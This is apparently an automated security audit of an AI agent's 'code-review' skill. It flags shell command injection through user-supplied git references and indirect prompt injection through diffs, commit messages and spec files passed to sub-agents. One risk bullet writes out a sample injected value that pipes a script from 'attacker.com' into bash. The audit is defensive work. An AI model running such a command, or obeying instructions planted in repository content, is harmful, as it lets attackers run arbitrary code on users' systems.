code-review

Warn

Audited by Gen Agent Trust Hub on Sep 19, 2026

Risk Level: MEDIUMCOMMAND_EXECUTIONINDIRECT_PROMPT_INJECTION
Full Analysis
  • [COMMAND_EXECUTION]: The skill instructs the agent to execute shell-based git commands using a 'fixed-point' reference provided directly by the user without explicit sanitization instructions.
  • Evidence: SKILL.md contains instructions to run git diff <fixed-point>...HEAD, git log <fixed-point>..HEAD, and git rev-parse <fixed-point> where <fixed-point> is a user-supplied string.
  • Risk: A malicious user or a prompt injection could provide a reference containing shell metacharacters (e.g., main; curl attacker.com/exploit | bash) to execute arbitrary commands if the underlying agent execution environment does not properly sanitize arguments.
  • [INDIRECT_PROMPT_INJECTION]: The skill processes untrusted data from the repository's git history and external specification files, creating an attack surface for indirect prompt injection.
  • Ingestion points: Untrusted data enters the context via git diff output, commit messages, issue tracker contents, and local files under docs/, specs/, or .scratch/.
  • Boundary markers: The instructions do not specify the use of delimiters (e.g., XML tags or triple backticks) or explicit 'ignore embedded instructions' warnings when passing the diff or specification content to the Standards and Spec Oracle sub-agents.
  • Capability inventory: The skill uses git tools and spawns analytical sub-agents. While the sub-agents are described as 'read-only', they are tasked with generating reports that influence the final summary presented to the user.
  • Sanitization: There is no evidence of sanitization, filtering, or validation of the content extracted from git history or specification files before it is interpolated into the prompts for the Oracle tasks.
Audit Metadata
Risk Level
MEDIUM
Analyzed
Sep 19, 2026, 01:25 AM
Security Audit — agent-trust-hub — code-review